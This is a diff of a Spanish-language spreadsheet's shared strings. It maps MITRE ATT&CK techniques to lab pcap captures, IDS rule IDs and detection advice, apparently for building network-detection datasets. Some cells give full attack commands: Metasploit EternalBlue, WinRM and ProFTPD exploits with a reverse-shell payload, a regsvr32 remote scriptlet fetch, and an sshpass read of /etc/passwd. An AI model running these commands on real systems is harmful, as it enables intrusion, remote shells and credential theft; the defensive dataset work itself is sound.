+    <t>T1537.pcapng</t>
+  </si>
+  <si>
+    <t>Deteccion por listas negras/anomalías</t>
+  </si>
+  <si>
+    <t>Transferir entre dos cuentas en la nube unos ficheros</t>
+  </si>
+  <si>
+    <t>Exfiltration Over C2 Channel</t>
+  </si>
+  <si>
+    <t>T1041</t>
+  </si>
+  <si>
+    <t>Exfiltración por canal C2</t>
+  </si>
+  <si>
+    <t>T1041.pcapng</t>
+  </si>
+  <si>
+    <t>2043217,2034567,2013028,2016992</t>
+  </si>
+  <si>
+    <t>50447, 2043217, 2034567, 2013028, 2016992</t>
+  </si>
+  <si>
+    <t>2002752, 2002749, 2006409, 2043217, 2034567, 2013028, 2016992, 2002824, 50447</t>
+  </si>
+  <si>
+    <t>Detección por anomalías basada en la sospecha de una extracción de información confidencial por un posible canal C2</t>
+  </si>
+  <si>
+    <t>Exfiltration over Web Service</t>
+  </si>
+  <si>
+    <t>T1567</t>
+  </si>
+  <si>
+    <t>Exfiltration to Cloud Storage</t>
+  </si>
+  <si>
+    <t>T1567.002</t>
+  </si>
+  <si>
+    <t>Exfiltrar datos de un equipo a la nube</t>
+  </si>
+  <si>
+    <t>Google Drive</t>
+  </si>
+  <si>
+    <t>T1567.002.pcapng</t>
+  </si>
+  <si>
+    <t>Transferir ficheros de un equipo a la nube</t>
+  </si>
+  <si>
+    <t>Execution</t>
+  </si>
+  <si>
+    <t>User Execution</t>
+  </si>
+  <si>
+    <t>T1204</t>
+  </si>
+  <si>
+    <t>Malicious Link</t>
+  </si>
+  <si>
+    <t>T1204.001</t>
+  </si>
+  <si>
+    <t>Enlace malicioso</t>
+  </si>
+  <si>
+    <t>wget</t>
+  </si>
+  <si>
+    <t>T1204.001.pcapng</t>
+  </si>
+  <si>
+    <t>Redireccion al pinchar en un enlace a un sitio malicioso. Comando : wget http://172.16.1.2 (Desde la víctima)</t>
+  </si>
+  <si>
+    <t>Windows Management Instrumentation</t>
+  </si>
+  <si>
+    <t>T1047</t>
+  </si>
+  <si>
+    <t>Ejecución de carga por WinRM</t>
+  </si>
+  <si>
+    <t>T1047.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>1394</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>, 20619</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
       <t>2002752,2002749,</t>
     </r>
     <r>
@@ -3233,191 +4751,64 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>2027768</t>
-    </r>
-  </si>
-  <si>
-    <t>Reglas genéricas que detecten un traspaso de archivos entre equipos utilizando protocolos de transferencia de ficheros como SMB, FTP... Dependiendo de las circunstancias del ataque tambien es importante detectar la transferencia de archivos malware que sean detectables mediante tráfico de red.</t>
-  </si>
-  <si>
-    <t>Servidor FTP en el servidor C2. A través de la conexión del atacante a la víctima, usando el comando ftp transferimos herramientas desde el servidor C2 a la víctima</t>
-  </si>
-  <si>
-    <t>Data Encoding</t>
-  </si>
-  <si>
-    <t>T1132</t>
-  </si>
-  <si>
-    <t>Standard Encoding</t>
-  </si>
-  <si>
-    <t>T1132.001</t>
-  </si>
-  <si>
-    <t>Codificacion de mensajes entre la victima y el C2 Server mediante Base64</t>
-  </si>
-  <si>
-    <t>Metasploit, curl, base64</t>
-  </si>
-  <si>
-    <t>Deteccion por anomalias</t>
-  </si>
-  <si>
-    <t>Servidor HTTP en el C2 Server. Intercambio de mensajes entre la victima y atacante mediante base64</t>
-  </si>
-  <si>
-    <t>Remote Access Software</t>
-  </si>
-  <si>
-    <t>T1219</t>
-  </si>
-  <si>
-    <t>Uso de TeamViewer para establecer canal de comunicación alternativo</t>
-  </si>
-  <si>
-    <t>TeamViewer</t>
-  </si>
-  <si>
-    <t>RemoteAccessSoftwareLocal.pcapng, RemoteAccessSoftwareNAT.pcapng</t>
-  </si>
-  <si>
-    <t>Deteccion por listas negras/anomalías. Monitorizar tráfico de red correspondiente a softwares de acesso remoto(AnyDesk, TeamViewer...)</t>
-  </si>
-  <si>
-    <t>Conexion mediante TeamViewer entre dos equipos</t>
-  </si>
-  <si>
-    <t>Dynamic Resolution</t>
-  </si>
-  <si>
-    <t>T1568</t>
-  </si>
-  <si>
-    <t>Fast Flux DNS</t>
-  </si>
-  <si>
-    <t>T1568.001</t>
-  </si>
-  <si>
-    <t>Esconder un C2 Server mediante un servidor DNS con bajo TTL y modo Fast Flux</t>
-  </si>
-  <si>
-    <t>bind, Metasploit</t>
-  </si>
-  <si>
-    <t>T1568_fastFluxDNS.pcapng</t>
-  </si>
-  <si>
-    <t>366,29456,384,408</t>
-  </si>
-  <si>
-    <t>366,29456,384,408,2100366</t>
-  </si>
-  <si>
-    <t>366,29456,384,408,2002752,2002749,2100366,2100384,2100408</t>
-  </si>
-  <si>
-    <t>2002752, 2100384, 2100366, 2100408, 2002749</t>
-  </si>
-  <si>
-    <t>Deteccion por anomalias o listas negras</t>
-  </si>
-  <si>
-    <t>Servidor DNS "Round Robin"</t>
-  </si>
-  <si>
-    <t>Hide Infrastructure</t>
-  </si>
-  <si>
-    <t>T1665</t>
-  </si>
-  <si>
-    <t>Esconder el servidor C2 utilizando un Proxy</t>
-  </si>
-  <si>
-    <t>Metasploit, HTTP Server</t>
-  </si>
-  <si>
-    <t>T1665.pcapng</t>
-  </si>
-  <si>
-    <t>2002752,2002749,2100628</t>
-  </si>
-  <si>
-    <t>Detección por reglas/anomalías. Resulta importante monitorizar tráfico de red con destino a dominios incluidos en listas negras, conexiones a equpos externos...</t>
-  </si>
-  <si>
-    <t>Esconder el servidor C2 utilizando un proxy</t>
-  </si>
-  <si>
-    <t>Protocol Tunneling</t>
-  </si>
-  <si>
-    <t>T1572</t>
-  </si>
-  <si>
-    <t>Tunelizar la conexión al C2 Server mediante SSH</t>
-  </si>
-  <si>
-    <t>SSH, Metasploit</t>
-  </si>
-  <si>
-    <t>T1572.pcapng</t>
-  </si>
-  <si>
-    <t>Deteccion por anomalías, monitorizando la creacion de nuevas conexiones</t>
-  </si>
-  <si>
-    <t>Tunelizar una conexion mediante SSH</t>
-  </si>
-  <si>
-    <t>Encrypted Channel</t>
-  </si>
-  <si>
-    <t>T1573</t>
-  </si>
-  <si>
-    <t>Assymetric Cryptography</t>
-  </si>
-  <si>
-    <t>T1573.002</t>
-  </si>
-  <si>
-    <t>Encriptar conexion con C2 Server</t>
-  </si>
-  <si>
-    <t>Metasploit, OpenSSL</t>
-  </si>
-  <si>
-    <t>T1573.002.pcapng</t>
-  </si>
-  <si>
-    <t>Encriptar conexion al C2 Server</t>
-  </si>
-  <si>
-    <t>Non-Standard Port</t>
-  </si>
-  <si>
-    <t>T1571</t>
-  </si>
-  <si>
-    <t>Sesión SSH en puerto 2200</t>
-  </si>
-  <si>
-    <t>ssh</t>
-  </si>
-  <si>
-    <t>T1571.pcapng</t>
-  </si>
-  <si>
+      <t>1394</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>2002752,2002749,</t>
+      <t>,20619</t>
+    </r>
+  </si>
+  <si>
+    <t>Regla genérica que detecte intento de ejecucion de código shell en un equipo</t>
+  </si>
+  <si>
+    <t>Ejecucion de payload en un equipo mediante WinRM. Comando: msfconsole -x "use exploit/windows/winrm/winrm_script_exec; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; set LPORT 5555; set username administrator; set password vagrant; set force_vbs true; run -z; sessions -c 'cmdkey /list'; sessions -k 1; exit"</t>
+  </si>
+  <si>
+    <t>Exploitation for Client Execution</t>
+  </si>
+  <si>
+    <t>T1203</t>
+  </si>
+  <si>
+    <t>Ataque con Botnet</t>
+  </si>
+  <si>
+    <t>T1203-C2018.pcapng</t>
+  </si>
+  <si>
+    <t>System Services</t>
+  </si>
+  <si>
+    <t>T1569</t>
+  </si>
+  <si>
+    <t>Service Execution</t>
+  </si>
+  <si>
+    <t>T1569.002</t>
+  </si>
+  <si>
+    <t>Ejecución de un Servicio / Fichero Ejecutable de manera remota</t>
+  </si>
+  <si>
+    <t>PsExec</t>
+  </si>
+  <si>
+    <t>T1569_system-services-service-execution.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">459, </t>
     </r>
     <r>
       <rPr>
@@ -3425,77 +4816,41 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>13586</t>
-    </r>
-  </si>
-  <si>
-    <t>Establecer una sesion SSH sobre un puerto no estandar. Comando: sshpass -p salas ssh salas@192.168.2.2 -p 2200 cat /etc/passwd</t>
-  </si>
-  <si>
-    <t>Defense Evasion, Persistence</t>
-  </si>
-  <si>
-    <t>Indicator Removal</t>
-  </si>
-  <si>
-    <t>T1070</t>
-  </si>
-  <si>
-    <t>Network Share Connection Removal</t>
-  </si>
-  <si>
-    <t>T1070.005</t>
-  </si>
-  <si>
-    <t>Eliminación de conexiones establecidas via Network Share en Windows</t>
-  </si>
-  <si>
-    <t>T1070_indicator-removal-network-share-connection-removal.pcapng</t>
-  </si>
-  <si>
-    <t>Detección por anomalías basada en desconexión repentina procedente de una dirección de varios recursos compartidos</t>
-  </si>
-  <si>
-    <t>Modify Registry</t>
-  </si>
-  <si>
-    <t>T1112</t>
-  </si>
-  <si>
-    <t>Modificación del Registro de forma remota</t>
-  </si>
-  <si>
-    <t>reg (Remoto)</t>
-  </si>
-  <si>
-    <t>T1112_modify-registry.pcapng</t>
-  </si>
-  <si>
+      <t>2010781</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">, 2025701, 2025699, </t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>44489</t>
-    </r>
+      <t>2027237</t>
+    </r>
+  </si>
+  <si>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>, 38319</t>
-    </r>
-  </si>
-  <si>
+      <t xml:space="preserve">459, </t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>44489</t>
+      <t>2010781</t>
     </r>
     <r>
       <rPr>
@@ -3503,167 +4858,23 @@
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>, 38319, 2002752, 2002749, 2044666, 2051116</t>
-    </r>
-  </si>
-  <si>
-    <t xml:space="preserve">Regla que detecte el envío de mensajes con protocolo WINREG o Remote Registry Service </t>
-  </si>
-  <si>
-    <t>Rogue Domain Controller</t>
-  </si>
-  <si>
-    <t>T1207</t>
-  </si>
-  <si>
-    <t>DCShadow: registro de un DC fraudulento para habilitar la manipulación de datos en un entorno Active Directory</t>
-  </si>
-  <si>
-    <t>T1207_rogue-domain-controller.pcapng</t>
-  </si>
-  <si>
-    <t>Regla que detecte una llamada a la función DRSUAPI_REPLICA_ADD (5)</t>
-  </si>
-  <si>
-    <t>System Binary Proxy Execution</t>
-  </si>
-  <si>
-    <t>T1218</t>
-  </si>
-  <si>
-    <t>Regsvr32</t>
-  </si>
-  <si>
-    <t>T1218.010</t>
-  </si>
-  <si>
-    <t>Ejecución de COM scriptlet remoto</t>
-  </si>
-  <si>
-    <t>Regsvr32.exe</t>
-  </si>
-  <si>
-    <t>T1218.010.pcapng</t>
-  </si>
-  <si>
-    <t>Aprovechar vulnerabilidad regsvr32.exe descargando y ejecutando scripts y librerias evadiendo controles de seguridad Windows. Comando: C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
-  </si>
-  <si>
-    <t>Template Injection</t>
-  </si>
-  <si>
-    <t>T1221</t>
-  </si>
-  <si>
-    <t>Inyectar un fichero mediante Phishing .docx con macros modificadas que permita pasar desapercibido</t>
-  </si>
-  <si>
-    <t>Sitios web convencionales (Gmail)</t>
-  </si>
-  <si>
-    <t>T1221.pcapng</t>
-  </si>
-  <si>
-    <t>402,50447,2002752,2002749,2013491,2013490,2009768,2100402</t>
-  </si>
-  <si>
-    <t>Detección por lista negra/anomalías. Debería monitorizarse y detectar tráfico de red hacia direcciones o dominios marcados en listas negras. En algún caso concreto, se puede descargar y ejecutar malware por lo que se debe monitorizar y detectar la descarga de este tipo de ficheros</t>
-  </si>
-  <si>
-    <t>Modificación de fichero .docx para, mediante macros, provocar la descarga y ejecución de malware en el equipo víctima</t>
-  </si>
-  <si>
-    <t>Network Boundary Bridging</t>
-  </si>
-  <si>
-    <t>T1599</t>
-  </si>
-  <si>
-    <t>NAT Traversal</t>
-  </si>
-  <si>
-    <t>T1599.001</t>
-  </si>
-  <si>
-    <t>Modificación de políticas de red para permitir tráfico externo a la red  interna</t>
-  </si>
-  <si>
-    <t>iptables</t>
-  </si>
-  <si>
-    <t>NBB1.pcapng, NBB2.pcapng</t>
-  </si>
-  <si>
-    <t>Deteccion por anomalías</t>
-  </si>
-  <si>
-    <t>Equipo intermedio entre red interna de la víctima y el atacante con firewall. El atacante con acceso a este equipo intermedio modifica las reglas del firewall iptables para permitir su tráfico.</t>
-  </si>
-  <si>
-    <t>Salto de VLAN</t>
-  </si>
-  <si>
-    <t>T1599_salto_vlan.pcapng</t>
-  </si>
-  <si>
-    <t>2101620, 2002752, 2002749</t>
-  </si>
-  <si>
-    <t>Detección por anomalías y estudio de topología de red, que detecte posibles vulnerabilidades relacionadas con el etiquetado apilable 802.1Q</t>
-  </si>
-  <si>
-    <t>Build Image on Host</t>
-  </si>
-  <si>
-    <t>T1612</t>
-  </si>
-  <si>
-    <t>Creacion y montado de un contenedor con un servidor SSH sobre un equipo previamente vulnerado</t>
-  </si>
-  <si>
-    <t>DockerAPI, SSH</t>
-  </si>
-  <si>
-    <t>BuildImageOnHostLocal.pcapng, BuildImageOnHostNAT.pcapng</t>
-  </si>
-  <si>
-    <t>Regla genérica que detecte descargas de contenedores mediante Docker API</t>
-  </si>
-  <si>
-    <t>Construir contenedor sobre el equipo víctima para evitar ser detectados.</t>
-  </si>
-  <si>
-    <t>Command and Control, Persistence</t>
-  </si>
-  <si>
-    <t>Lateral Movement</t>
-  </si>
-  <si>
-    <t>Exploitation of Remote Services</t>
-  </si>
-  <si>
-    <t>T1210</t>
-  </si>
-  <si>
-    <t>EternalBlue</t>
-  </si>
-  <si>
-    <t>T1210-eternal_blue.pcapng</t>
-  </si>
-  <si>
-    <t>2102465,2025992,2025649,2025650,42944</t>
-  </si>
-  <si>
-    <t>44487,44485,44489,5730,42944,2102465,2025992,2025649,2025650</t>
-  </si>
-  <si>
+      <t xml:space="preserve">, 2025701, 2025699, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027237</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>2002752,2002749</t>
+      <t xml:space="preserve">, 44489, </t>
     </r>
     <r>
       <rPr>
@@ -3671,38 +4882,33 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>,2044666,2023997,2044665,2102465,2025992,2025649,2025650,2024766,42944,44487,44485,44489,5730</t>
-    </r>
-  </si>
-  <si>
-    <t>Regla genérica que detecte uso de EternalBlue</t>
-  </si>
-  <si>
-    <t>Uso de exploit Eternalblue para obtener movimiento lateral y establecimiento de meterpreter. Comando: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; run -z; sessions -c getuid; sessions -k 1; exit"</t>
-  </si>
-  <si>
-    <t>Ataque Web</t>
-  </si>
-  <si>
-    <t>DVWA, In-house selenium framework</t>
-  </si>
-  <si>
-    <t>T1210-web_attack-C2018.pcapng</t>
-  </si>
-  <si>
-    <t>Ejecución de código remoto basado en vulnerabilidades de servidor FTP</t>
-  </si>
-  <si>
-    <t>T1210-remote_code_execution.pcapng</t>
-  </si>
-  <si>
+      <t>30281</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>, 26385</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">459, </t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>34225,34447,34224</t>
+      <t>2010781</t>
     </r>
     <r>
       <rPr>
@@ -3710,17 +4916,15 @@
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>,50447</t>
-    </r>
-  </si>
-  <si>
+      <t xml:space="preserve">, 2025701, 2025699, </t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>2002752,2002749,2010732,34225,34447,34224,</t>
+      <t>2027237</t>
     </r>
     <r>
       <rPr>
@@ -3728,95 +4932,23 @@
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>50447</t>
-    </r>
-  </si>
-  <si>
-    <t xml:space="preserve">Regla genérica que detecte intento de ejecucion remota de codigo en servidor FTP </t>
-  </si>
-  <si>
-    <t>Uso de comandos SITE/CPFR/CPTO en la version 1.3.5 de ProFTPD  que permite copiar ficheros a cualquier usuario no autenticado. Comando: msfconsole -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS 192.168.2.2; set SITEPATH /var/www/html; set LHOST 192.168.1.3; set LPORT 4444; set payload cmd/unix/reverse_perl; run -z; sessions -c ls; sessions -k 1; exit"</t>
-  </si>
-  <si>
-    <t>Remote Service Session Hijacking</t>
-  </si>
-  <si>
-    <t>T1563</t>
-  </si>
-  <si>
-    <t>RDP Hijacking</t>
-  </si>
-  <si>
-    <t>T1563.002</t>
-  </si>
-  <si>
-    <t>Secuestro de sesión RDP mediante tscon.exe</t>
-  </si>
-  <si>
-    <t>tscon.exe</t>
-  </si>
-  <si>
-    <t>Regla genérica para detectar conexiones RDP entre un orígen y un servidor o destino</t>
-  </si>
-  <si>
-    <t>Uso de Windows Server 2012 R2 con DNS, Active Directory y Servicio de Escritorio Remoto</t>
-  </si>
-  <si>
-    <t>Lateral Tool Transfer</t>
-  </si>
-  <si>
-    <t>T1570</t>
-  </si>
-  <si>
-    <t>Transferencia de herramientas para la continuación del ataque entre máquinas utilizando protocolos de compartición de archivos</t>
-  </si>
-  <si>
-    <t>T1570.pcapng</t>
-  </si>
-  <si>
-    <t>Transferencia mediante FTP de ficheros entre dos equipos</t>
-  </si>
-  <si>
-    <t>Internal Spear-phishing</t>
-  </si>
-  <si>
-    <t>T1534</t>
-  </si>
-  <si>
-    <t>Phishing interno entre equipos pertenecientes a un dominio con servidor de correo habilitado</t>
-  </si>
-  <si>
-    <t>MailEnabler, Thunderbird</t>
-  </si>
-  <si>
-    <t>T1534_internal-spearphishing.pcapng</t>
-  </si>
-  <si>
-    <t>Detección por anomalías, análisis de la estructura de correos electrónicos, petición de información confidencial, etc</t>
-  </si>
-  <si>
-    <t>Network Service Discovery</t>
-  </si>
-  <si>
-    <t>T1046</t>
-  </si>
-  <si>
-    <t>Descubrimiento de servicios y version</t>
-  </si>
-  <si>
-    <t>Nikto</t>
-  </si>
-  <si>
-    <t>T1046_version_services_detection1.pcapng</t>
-  </si>
-  <si>
+      <t xml:space="preserve">. 44489, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>30281</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">2002677, </t>
+      <t xml:space="preserve">, 26385, 2101620, 2100459, </t>
     </r>
     <r>
       <rPr>
@@ -3824,7 +4956,7 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>2101071</t>
+      <t>2044666</t>
     </r>
     <r>
       <rPr>
@@ -3832,856 +4964,8 @@
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>, 2101242, 2027262, 2016141, 2101129, 2100987, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t xml:space="preserve">50447, 300003, 31940, 2002677, </t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2101071</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t xml:space="preserve">, 2101242, 2027262, 2016141, </t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2101129</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t xml:space="preserve">, </t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2100987</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t xml:space="preserve">50447, 300003, 31940, 2002752, 2002749, 2002677, </t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2101071</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t xml:space="preserve">, 2101242, 2027262, 2016141, 2003595, </t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2101129</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t xml:space="preserve">, </t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2100987</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>, 2027265, 2027250, 2018752, 2027263, 2009885, 2101245, 2100971, 2027253, 2101852, 2101145, 2010767, 2010766, 2102056, 2101288, 2101738, 2009151, 2001343, 2100993, 2101256, 2003099, 2101016, 2019714, 2101402, 2014379, 2011031, 2049400, 2009362, 2009361, 2101002, 2101945, 2101401, 2101829, 2012911, 2030337, 2101244, 2101122, 2100988, 2049401, 2001949, 2012913, 2011042, 2010963, 2006446, 2006445, 2011040, 2009714, 2001218, 2101827, 2004589, 2019526, 2004592, 2101877, 2101108, 2100915, 2016184, 2009001, 2020296, 2002731, 2100937, 2100952, 2100977, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2002070, 2021390, 2101201, 2101013, 2101193, 2101023, 2101487, 2101018, 2101372, 2009485, 2009884, 2102073, 2102131, 2049402, 2101156, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2100981, 2100982, 2101403, 2101332, 2002133, 2016182, 2011696, 2010377, 2009435, 2003670, 2011564, 2009167, 2010095, 2009317, 2009318, 2003740, 2009397, 2002681, 2010920, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009382, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2009871, 2009872, 2009873, 2009196, 2003738, 2010099, 2003699, 2017442, 2009459, 2009898, 2009166, 2003677, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2002815, 2009788, 2010027, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2003731, 2009163, 2003688, 2003696, 2009892, 2009398, 2002800, 2003703, 2100884, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2003739, 2003333, 2008922, 2009427, 2002902, 2008871, 2003680, 2017441, 2003698, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2009180, 2003737, 2003717, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2002996, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2017440, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2003706, 2003707, 2003708, 2003715, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2008996, 2009179, 2019524, 2002901, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160</t>
-    </r>
-  </si>
-  <si>
-    <t>Múltiples mecanismos. Por ejemplo, regla que detecte un escaneo de puertos (alto número de peticiones hacia un rango de puertos en poco tiempo)</t>
-  </si>
-  <si>
-    <t>T1046_version_services_detection2.pcapng</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>384,453,408,451,1421,1420,1418,257,</t>
